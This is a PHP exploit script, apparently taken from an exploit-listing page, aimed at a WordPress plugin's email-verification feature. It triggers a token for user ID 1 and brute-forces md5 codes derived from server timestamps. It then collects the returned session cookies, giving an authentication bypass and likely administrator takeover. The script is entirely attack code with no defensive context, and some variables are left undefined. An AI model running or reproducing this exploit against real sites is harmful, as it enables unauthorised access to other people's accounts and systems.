Share
## https://sploitus.com/exploit?id=WPEX-ID:B5795F8A-78B8-481E-8522-7BD4689C917C
<?php

// Settings
$wp_url = $argv[1];

$starttime = time();

// Initiate the token
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $wp_url . '/?wcj_user_id=1');
curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
$content = curl_exec($ch);
curl_close($ch);

$endtime = time();

//Loop through to get the right time. 
foreach (range($starttime, $endtime) as $number) {
   //Json Encode Our Goods
    $data2 = array(
        "id" => "1",
        "code" => md5($number));
    $postdata1 = base64_encode(json_encode($data2));
    echo $postdata1;
    //Create New Post
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $wp_url . '?wcj_verify_email=' . $postdata1);
    curl_setopt($ch, CURLOPT_CUSTOMREQUEST, "POST");
    curl_setopt($ch, CURLOPT_COOKIEJAR, $cookiejar);
    curl_setopt($ch, CURLOPT_COOKIEFILE, $cookiejar);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, false);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
    curl_setopt($ch, CURLOPT_HEADER, 1);
    $output = curl_exec($ch);
    curl_close($ch);
    preg_match_all('/^Set-Cookie:\s*([^;]*)/mi', $output, $matches);
    $cookies = array();
    foreach($matches[1] as $item) {
        parse_str($item, $cookie);
        $cookies = array_merge($cookies, $cookie);
    }
    var_dump($cookies);
}
?>